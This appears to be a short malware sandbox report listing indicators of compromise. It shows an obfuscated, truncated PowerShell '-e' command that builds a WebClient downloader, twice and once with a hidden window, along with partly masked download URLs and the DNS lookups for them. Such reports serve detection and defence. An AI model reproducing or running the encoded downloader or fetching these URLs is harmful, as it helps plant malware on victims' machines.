Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB1AG4AdABmAE8AWgA9ACgAJwBFAHYAOQBHACcAKwAnAHQAUwAnACsAJwBaACcAKQA7ACQAegBNADQAaQBpAHIATgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAZgBkAHMAWgBHAD0AKAAnAG...
- http://mi#######idainvestigator.com/31OYftWmPs
- http://nr###klam.com/JxRnXI5
- http://ne###infor.com/pFp4vo9bZg
- http://wa######neroulettespelen.nl/y9Sb0nnqe
- DNS ASK mi#######idainvestigator.com
- DNS ASK nr###klam.com
- DNS ASK st#####eracademy.com
- DNS ASK ne###infor.com
- DNS ASK wa######neroulettespelen.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB1AG4AdABmAE8AWgA9ACgAJwBFAHYAOQBHACcAKwAnAHQAUwAnACsAJwBaACcAKQA7ACQAegBNADQAaQBpAHIATgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAZgBkAHMAWgBHAD0AKAAnAG...' (with hidden window)